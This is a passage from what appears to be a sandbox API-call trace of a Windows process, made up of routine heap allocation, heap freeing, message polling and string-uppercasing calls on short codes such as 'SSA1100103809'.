Size=0x10) returned 0x2aaaee8 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.056] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa918 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.057] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0209.057] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0209.058] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.058] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.058] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.058] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0209.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0209.059] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0209.060] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.060] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ff8 [0209.060] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.060] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0209.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ff8 | out: hHeap=0x2af0000) returned 1 [0209.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.061] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0209.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0209.062] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0209.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0209.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.063] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0209.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: 